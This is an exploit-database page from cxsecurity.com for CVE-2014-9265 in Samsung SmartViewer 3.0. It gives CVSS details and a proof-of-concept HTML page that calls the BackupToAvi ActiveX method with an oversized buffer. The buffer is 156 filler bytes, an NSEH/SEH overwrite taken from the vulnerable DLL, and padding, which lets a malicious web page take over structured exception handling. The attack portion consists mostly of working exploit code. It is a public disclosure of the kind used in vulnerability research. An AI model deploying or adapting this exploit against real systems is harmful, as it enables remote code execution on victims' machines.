Samsung SmartViewer BackupToAvi 3.0 Remote Code Execution

2015.01.20
Credit: Praveen Darshanam
Risk: High
Local: No
Remote: Yes
CVE: CVE-2014-9265
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = ""; var buf2 = ""; //offset to SE is 156, initial analysis using metasploit cyclic pattern for (i=0; i<156; i++) { buf1 += "A"; } var nseh = "DD"; var seh = "\x87\x10"; //from Vulnerable DLL junk = buf1 + nseh + seh; //remaining buffer for (j=0; j<(payload_length-junk.length); j++) { buf2 += "B"; } //final malicious buffer var fbuff = junk + buf2; target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff); </script> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top